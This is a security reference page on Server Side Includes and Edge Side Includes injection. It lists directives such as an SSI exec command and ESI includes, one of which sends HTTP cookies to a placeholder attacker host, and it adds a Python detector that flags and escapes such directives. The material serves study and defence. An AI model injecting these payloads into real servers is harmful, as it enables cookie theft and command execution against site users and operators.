XXX Side Includes (ESI/SSI)

Server Side Includes (SSI)

server_side_attacks

Server Side Includes are Apache directives in HTML files that are evaluated when the file is served.

The directives are usually served in .shtml, .shtm, or .stm files.

<!--#echo var="DATE_LOCAL" -->
<!--#printenv -->

<!--#include virtual="/cgi-bin/counter.pl" -->
<!--#include virtual="/footer.html" -->

<!--#exec cmd="ls" -->

<!--#fsize file="index.php" -->
<!--#flastmod file="index.php" -->

⚠️ The include directive can include non-HTML files, but not hidden files.

Edge Side Includes (ESI)

Edge Side Includes (ESI) is an XML-based markup language. It is a set of instructions to efficiently cache web content.

Developers can split an HTML page into multiple fragments. ESI directives within an HTML file instruct HTTP surrogates, such as CDNs or reverse proxies, how to fetch the HTML fragments.

The following header in the response explicitly indicates the use of ESI:

Surrogate-Control: content="ESI/1.0"

<esi:include src=http://IP>
<esi:include src=http://IP/XSSPAYLOAD.html>
<esi:include src=http://IP/cookie_stealer.php?xxx=$(HTTP_COOKIE)>
<esi:include src="lfi.txt">
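
A defender-side check for the directives listed on this page, as an added example (not code from the original page): it flags SSI and ESI directives in untrusted input or response bodies, tests for the Surrogate-Control header shown above, and HTML-escapes input before it is reflected. The function names, the risk set and the sample strings are constructed for illustration.

```python
import html
import re

# SSI directive: <!--#name attr="value" ... --> (tolerates stray whitespace)
SSI_RE = re.compile(r"<!--\s*#\s*(\w+)(.*?)-->", re.S)
# ESI element: <esi:name attr=value ...> (tolerates a space after "esi:")
ESI_RE = re.compile(r"<\s*esi:\s*(\w+)([^>]*)>", re.I)
# Assumed risk set: directives that run commands, pull in other
# resources, or dump the environment
HIGH_RISK = {"exec", "include", "printenv"}


def find_directives(text):
    """Return (kind, name, args, high_risk) for each SSI/ESI directive found."""
    hits = []
    for kind, rx in (("ssi", SSI_RE), ("esi", ESI_RE)):
        for m in rx.finditer(text):
            name = m.group(1).lower()
            hits.append((kind, name, m.group(2).strip(), name in HIGH_RISK))
    return hits


def esi_enabled(headers):
    """True when a response's Surrogate-Control header advertises ESI."""
    for key, value in headers.items():
        if key.lower() == "surrogate-control" and "esi/" in value.lower():
            return True
    return False


def neutralize(untrusted):
    """HTML-escape untrusted input so it cannot form a directive when reflected."""
    return html.escape(untrusted, quote=True)


# Constructed sample inputs (not taken from real traffic)
SAMPLES = [
    'Alice <!--#exec cmd="ls" -->',
    '<esi:include src="lfi.txt">',
    "plain comment <!-- not a directive -->",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(find_directives(s), "->", neutralize(s))
```

Escaping is applied at the point where user input is written into a page that the server or surrogate will parse; the detector is suited to input validation and to reviewing stored content or logs.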

📚 Refer to the gosecure article.